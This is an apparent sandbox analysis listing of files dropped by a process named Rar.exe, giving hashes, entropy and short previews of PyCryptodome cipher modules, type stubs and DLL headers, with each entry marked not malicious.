                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1107
                                                                                                                                                                                                                                  Entropy (8bit):4.862920256864568
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RElsAIfUA0nRNne3yFnR3Fne3TP/Wwn90nf5GodLVYBy:tfUJvesLeiwanoo+w
                                                                                                                                                                                                                                  MD5:DED98A1B5B497FB5816021E8B6E5F6F4
                                                                                                                                                                                                                                  SHA1:977F227DD05557AEDD8C40E653D74AEAF3734A43
                                                                                                                                                                                                                                  SHA-256:6D880A3628C47D9BCE851019C82720D570F44699E1B453AF432AE4A7B20A1273
                                                                                                                                                                                                                                  SHA-512:C6494CE19133C645285D7ACA56AD2F0D9E978ED2C4C7BB58A9C90B095A360DA3881E0D6F308F3B01508A331CCBF070690543BAC826FF47E8F9153949D92D9EF4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Tuple, overload, Optional....Buffer = bytes|bytearray|memoryview....class ChaCha20Poly1305Cipher:.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... def update(self, data: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, received_mac_tag: str) -> None: ..... def encrypt_and_digest(self, plaintext: Buffer) -> Tuple[bytes, bytes]: ..... def decrypt_and_verify(self, ciphertext: Buffer, received_mac_tag: Buffer) -> bytes: .......def new(key
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6105
                                                                                                                                                                                                                                  Entropy (8bit):4.865470874769693
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:dOFQHvotgiwHCXjG6DH5K0kmIbU6Ct4qeAYZRFWotK0:dcQHv2gUqC5K0kmIct4NZRYotK0
                                                                                                                                                                                                                                  MD5:1B182D8CD016EDC5F53015A433BE05D5
                                                                                                                                                                                                                                  SHA1:531C8DB19CDA7EDEE5B45B83D0C309F4EA65C1D5
                                                                                                                                                                                                                                  SHA-256:BAE52D7A7D2CD509D466156DC2878D7E4194BB304A8CB555F353EC00108C9186
                                                                                                                                                                                                                                  SHA-512:3D08AF59AA18156E5086E061BBDDD3E7E321A5EB98B1EFE4CCE56D7CA668CDFD167ECEF8F42A66FB6450797F21A6A21841FE24A606B0F1F959375CA6F4279227
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/DES.py : DES..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =====================================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1001
                                                                                                                                                                                                                                  Entropy (8bit):4.909258900429456
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+Aiv7Hoc6iTD3IouwDNqDNMN3zb1DoeRHT:K+1+O+O+s+8+s+w+H7XY6JqJejbFoeRz
                                                                                                                                                                                                                                  MD5:1EA64CB2FDD42F20112DF249B9A7CB87
                                                                                                                                                                                                                                  SHA1:633110F4D03C3EDF415640989802108EC2764422
                                                                                                                                                                                                                                  SHA-256:98BBDA18A15E4757AB66CC049EADA7FE944FF2D1093EE70F643D634CAF296E7E
                                                                                                                                                                                                                                  SHA-512:2845EBEC10C8250A0B4C7D0AB87245CF91D07D0F0973B0289516F94494D5698E17A9709D1B411B04908F02FC83B0922F0AEDEADF7901106184EA247729DAADF8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....DESMode = int....MODE_ECB: DESMode..MODE_CBC: DESMode..MODE_CFB: DESMode..MODE_OFB: DESMode..MODE_CTR: DESMode..MODE_OPENPGP: DESMode..MODE_EAX: DESMode....def new(key: Buffer,.. mode: DESMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_size: int.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7112
                                                                                                                                                                                                                                  Entropy (8bit):4.8687640980714715
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:dKQHvCgthz1GPoiRxwKIUK9t4A1zRYotKa:YeCgHAhRn9K9t42NYotKa
                                                                                                                                                                                                                                  MD5:44204A7CBBF99E82EB31B7F746B43AB3
                                                                                                                                                                                                                                  SHA1:4589336CF1A1D1E74DAAA10E87C898DD804DB7F8
                                                                                                                                                                                                                                  SHA-256:70D9B525599D85146924EF8DBDF0980C42A03F4FBB2D01A2CADBF7ED2D43CD93
                                                                                                                                                                                                                                  SHA-512:1D0403F3BCDF6AE8A7A7D2FE339112B7BE604EA1D103388547760FF73CBBC7DF5106CF6D702A6134CC4C51A836FEB3ED42AC0BFDE90A46E67F684ECCA3DDF4F6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/DES3.py : DES3..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1073
                                                                                                                                                                                                                                  Entropy (8bit):4.981416466224206
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RENbKAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+4NINSfWvOkDoEDNqDNMN3zb1DoeRHYX:KI1+O+O+s+8+s+w+4GxOkDRJqJejbFo7
                                                                                                                                                                                                                                  MD5:4E6C49F8750DD064B28D3138434CC5F3
                                                                                                                                                                                                                                  SHA1:121984851A159ED24D11E4E79DF4B0B4BCF6AE63
                                                                                                                                                                                                                                  SHA-256:9005CB3F60F682B7840F7112D940128AE8EA1777DAC8C1F3A4B8F0E17F6A398B
                                                                                                                                                                                                                                  SHA-512:E21FC0A0B2D2CCD167CC2B9B0B9DE66771B11AF4CF2D9510F53E029D1CC43407A03B2866C000E6E31975C73B9457BB3CB99317E8FC51D276B84C93E9CC6CBEB3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Dict, Tuple, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....def adjust_key_parity(key_in: bytes) -> bytes: .......DES3Mode = int....MODE_ECB: DES3Mode..MODE_CBC: DES3Mode..MODE_CFB: DES3Mode..MODE_OFB: DES3Mode..MODE_CTR: DES3Mode..MODE_OPENPGP: DES3Mode..MODE_EAX: DES3Mode....def new(key: Buffer,.. mode: DES3Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, C
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8783
                                                                                                                                                                                                                                  Entropy (8bit):4.798422325497298
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:dEFQHvo7wHQeYz8L34mghqko9uN8I3y5xU3a5tLfZCMKesDBkFBIMd3T20kqk9ku:d6QHv13GFA4IywxoXKUF9ku
                                                                                                                                                                                                                                  MD5:1451B65F3E7EC1B91C1D496EAAA705D0
                                                                                                                                                                                                                                  SHA1:D695CB12CEE4E321748CA8E4DEBBC82945628769
                                                                                                                                                                                                                                  SHA-256:D924170C92BE9E1324DEDC5B731F92513CDF759A251148DF8ECF1A0E6011D77C
                                                                                                                                                                                                                                  SHA-512:5D002279E789E867E643F97B91C65C45DA561171D0CFCF6EC3A3CBB35BBD3B44923EC5249D89E788D637CF8F7D9617808C2CEE806775E49FB5E9D14B3B6A1BED
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/PKCS1_OAEP.py : PKCS#1 OAEP..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ======================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1214
                                                                                                                                                                                                                                  Entropy (8bit):4.8233945885346685
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1REjQFC19+1bs1zrhqMS8KDLYOT3OMIAl2HH8Myje+RGoziVEpvNtMEHo:gQFy+1o1IttDLteMI5aoJupVjHo
                                                                                                                                                                                                                                  MD5:A065FCD801FD38FDC5457C65A8B94801
                                                                                                                                                                                                                                  SHA1:7C353866EA0CFC0E55A90530714758115424B723
                                                                                                                                                                                                                                  SHA-256:DFEAE2746DEFD28744873401D008462C4C1EF4899B7BAFAEAE14FCA12A5BB73E
                                                                                                                                                                                                                                  SHA-512:959C65295EA6C93D67E7C1E5361A03C09CB7A37C7C64A92334A0C612952C3609708766780C99BD93DD5A9C23D79B7A3CF0C0614D083A13F3F9A8D5DBC3E6C7A2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Optional, Union, Callable, Any, overload..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class HashLikeClass(Protocol):.. digest_size : int.. def new(self, data: Optional[bytes] = ...) -> Any: .......class HashLikeModule(Protocol):.. digest_size : int.. @staticmethod.. def new(data: Optional[bytes] = ...) -> Any: .......HashLike = Union[HashLikeClass, HashLikeModule]....Buffer = Union[bytes, bytearray, memoryview]....class PKCS1OAEP_Cipher:.. def __init__(self,.. key: RsaKey,.. hashAlgo: HashLike,.. mgfunc: Callable[[bytes, int], bytes],.. label: Buffer,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: RsaKey,.. hashAlgo: O
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7208
                                                                                                                                                                                                                                  Entropy (8bit):4.875780210138466
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:dtFQHvov1zDH7zA3ZutH8MKD8LzmodYavD+U8FbPNapwDQVs3a:drQHvp42ME8H/d8RNuwk6a
                                                                                                                                                                                                                                  MD5:33552EE7C36C1E8B6AC76AAA51B18EA2
                                                                                                                                                                                                                                  SHA1:4B0476C73EFCA6264D64DEED3B2EC21F67B2FD82
                                                                                                                                                                                                                                  SHA-256:8BBD80ADF2035DED54365EB2076468D32E6BF9A5007C19557AFEAE19932A685F
                                                                                                                                                                                                                                  SHA-512:6AFE6599B48464CE0AEB8F29225A85EFE722C558E9F1F8EE30FD2EFB201FCC663F8E42355452D19AE905FDDB6A13C30E4FDBC57D17F94BDC118EBAAC90538A47
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/PKCS1-v1_5.py : PKCS#1 v1.5..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ======================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):706
                                                                                                                                                                                                                                  Entropy (8bit):4.785885591583499
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:1REYB1mmN+1bgBxpvIY3NwnNc1AlPcJZVyMnynj5wnZ03Rqqav+IAAozPmJifJEt:1REq7+1bspT3ENIAlUH8Myje+wqKozuP
                                                                                                                                                                                                                                  MD5:48B6BF106FC448220A97A73FBFA2425F
                                                                                                                                                                                                                                  SHA1:9899751126284AEC60B7D2C28047A93063B9CB20
                                                                                                                                                                                                                                  SHA-256:219BE400169E585320C518A50540EDA12E3C4F489322C42D56FDAD283D07A021
                                                                                                                                                                                                                                  SHA-512:D05EF3D93B5460A172FC3AB0E21B256CA3CE7BA3C7569E8074E01FDA2A7A309F63EEA6D7FB17D501DC77EC639C963B6D07A0EB0094A6DBF6C4645A30FB46D36E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Callable, Union, Any, Optional, TypeVar....from Crypto.PublicKey.RSA import RsaKey....Buffer = Union[bytes, bytearray, memoryview]..T = TypeVar('T')....class PKCS115_Cipher:.. def __init__(self,.. key: RsaKey,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer,.. sentinel: T,.. expected_pt_len: Optional[int] = ...) -> Union[bytes, T]: .......def new(key: RsaKey,.. randfunc: Optional[Callable[[int], bytes]] = ...) -> PKCS115_Cipher: .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6516
                                                                                                                                                                                                                                  Entropy (8bit):4.625878868247197
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:GFQHvo7H4sIR05Jox+lgRXv8NBgQ9Qb3B0NpLPpnhtV8:UQHvMKDRXUNBgHGjRhtV8
                                                                                                                                                                                                                                  MD5:35B1A807346DF9FAD49A2396E0E7C64E
                                                                                                                                                                                                                                  SHA1:9A46CF85539233672C3ED0D06E4F1EE5B53BFB27
                                                                                                                                                                                                                                  SHA-256:80A7769DE32A81B8FB8CBE362066FF80711D630C0BEB39235246E4FD53E11870
                                                                                                                                                                                                                                  SHA-512:DF42F3A86A75FA52B2005A493B3E48CBDC0972CD81811C70308CB80D7006CE88FD6E9AA3393D2C687855030EF17A2031F4C8D5371888944FE8F8F2AC439C45C4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/Salsa20.py : Salsa20 stream cipher (http://cr.yp.to/snuffle.html)..#..# Contributed by Fabrizio Tarizzo <fabrizio@fabriziotarizzo.org>...#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):770
                                                                                                                                                                                                                                  Entropy (8bit):4.753367031924495
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RElTcAI4zFeBFAtnRNne3yFnR3Fne3rod8VYi:N4heryvesLe71+i
                                                                                                                                                                                                                                  MD5:F43BFBB1DE638F92162C8659DEFF5FCC
                                                                                                                                                                                                                                  SHA1:791719D6BDC25E30D7B0A7DB4AF08FF1A621A083
                                                                                                                                                                                                                                  SHA-256:EDCD33B9365AD546CF6B01C7FEFC73F1E7558BB50BFDB47FEF26212C2E027AE6
                                                                                                                                                                                                                                  SHA-512:1EEDEBCBCE99C19C2F489DDBD7B0C1B9020CBBC4A29C9E2E02AF3BA3FBECE0AB1E4F97BE2A62148F1E90B77B7B4AB88DAC847902BB984C7C4787D4B88D113B4B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Tuple, Optional, overload, Optional....Buffer = bytes|bytearray|memoryview....class Salsa20Cipher:.. nonce: bytes.. block_size: int.. key_size: int.... def __init__(self,.. key: Buffer,.. nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> Salsa20Cipher: .......block_size: int..key_size: Tuple[int, int]....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9216
                                                                                                                                                                                                                                  Entropy (8bit):4.959115197910263
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:T6Ieb9PEt0jBWMNWJzJjOjB/jAXMVn7MNN:ms0vYJ1j2r9n7WN
                                                                                                                                                                                                                                  MD5:47B5D19D47FCB7D3B7A946541E94B837
                                                                                                                                                                                                                                  SHA1:6208B03F489ACD43AAD70019861757DC8FA612B2
                                                                                                                                                                                                                                  SHA-256:4E5E63A8DF659E5600077203F4B96D9C4CCD9E676DB15F4E27F415DB80938DC3
                                                                                                                                                                                                                                  SHA-512:B9D89B2BC6D4760CB217B12016359920EAB375C68A0C33DA7AD26A3298B5A0BBEA1E7180B285F0816542BC3BB210F39EFB12399794DACFAA5AD95D63450ADA15
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.?.go..v...ao..(...`o..co..Bo..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.S.bo..Y..bo..Richco..................PE..L...9..e...........!...%............N........ ...............................`............@..........................%.......%..d....@.......................P..D...p!............................... ..@............ ..t............................text...S........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc..D....P......."..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5336
                                                                                                                                                                                                                                  Entropy (8bit):4.836111981939897
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:MHDqrYJALrYJHdt3EHGuITiwnHav1ZaVDYyOKgiaiJrJtk3I99m2Ht3HRF29:0qrskrs9t3q/ITHSVNi1bk3ITm6tXRY9
                                                                                                                                                                                                                                  MD5:A5F07807C63A0A82CFE7F644D72C9F9D
                                                                                                                                                                                                                                  SHA1:4F44ED26FD9770A9B8ED279C9E75FFEB2C84B756
                                                                                                                                                                                                                                  SHA-256:26B7450998B5E04410A77486C695457C58DCBC8DB24F50CC685651D223F3BE8E
                                                                                                                                                                                                                                  SHA-512:535FDCFDDDF7D64D097B0B51F64EBD14D453895B167E379D105E15F8F9681100B324A02004A3DD059B599EF88C01B81E0AD5546E90F1251EA2172BA5DF6D9252
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2019, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                                                  Entropy (8bit):4.919666506917015
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:1REYBNHK+kb/Vfw1ggHzrIY3MTDyo5Alm0Wgw0Tm6sRy/6WXHg:1REYBQ+kzlbgHvIY3YyogmvNZRy/O
                                                                                                                                                                                                                                  MD5:4030500BC383DEE6F4BBDF228147813E
                                                                                                                                                                                                                                  SHA1:DE9B1C78DD481B3B42A29AB5485C2C1B3EDFF182
                                                                                                                                                                                                                                  SHA-256:4917140D2EAE01669B206BEAB2164796D2DF836CFBD8ACCC9189CF4E6EEBEDB2
                                                                                                                                                                                                                                  SHA-512:FCAE9156019C79B2033E53F4F0626FD729F8B99F6EB73C837330D5AE079F19CCBA33A7EB2C72CC3055C365B2ED272AFCD7313310A9C2F1120EA16FF0E7AFF63A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Iterable....from Crypto.Cipher._mode_ecb import EcbMode....MODE_ECB: int....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: int,...salt: Buffer,...cost: int) -> EcbMode: .......block_size: int..key_size: Iterable[int]..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                  Entropy (8bit):5.548161556523813
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:TcKgdPEzpETBWctWJmIJjOs6PBSwCTh9lknMVnbENs:o8pEv4JmAjpABSwCTh9JnbOs
                                                                                                                                                                                                                                  MD5:54E6DE102DCBEF46AE7B5AC9F007E826
                                                                                                                                                                                                                                  SHA1:D3FE51E15B5F3AD186B44F69967593178FCFE537
                                                                                                                                                                                                                                  SHA-256:E7EF3EFE01606EBE564C1818EE5839A997CEB8B99846F6C4FBA86A09BCF9A507
